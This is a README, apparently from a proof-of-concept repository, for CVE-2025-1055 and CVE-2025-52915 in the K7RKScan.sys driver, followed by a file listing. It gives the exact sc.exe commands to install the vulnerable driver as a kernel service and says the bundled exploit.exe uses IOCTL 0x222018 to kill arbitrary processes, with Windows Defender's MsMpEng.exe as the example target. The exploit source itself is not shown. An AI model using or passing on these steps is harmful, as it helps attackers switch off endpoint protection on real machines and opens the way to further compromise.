PoC for CVE-2025-1055 and CVE-2025-52915 using K7RKScan.sys# CVE-2025-1055-poc
PoC for CVE-2025-1055 and CVE-2025-52915 using K7RKScan.sys. This PoC use the `0x222018` IOCTL to terminate arbitrary processes.
# Usage
Installing driver:
```
sc.exe create K7RKScan_1516.sys binPath=C:\Users\Administrator\Downloads\K7RKScan_1516.sys type=kernel && sc.exe start K7RKScan_1516.sys
```
Running PoC:
```
exploit.exe
```
It will terminate the `MsMpEng.exe` process (windows defender).
# References
https://blacksnufkin.github.io/posts/BYOVD-CVE-2025-52915/
[4.0K] /data/pocs/7f573457ce10dd3d8d048acf7b045da0a4060bb9
├── [1.6K] exploit.c
├── [ 27K] K7RKScan_1516.sys
├── [ 55K] K7RKScan_2310.sys
└── [ 499] README.md
0 directories, 4 files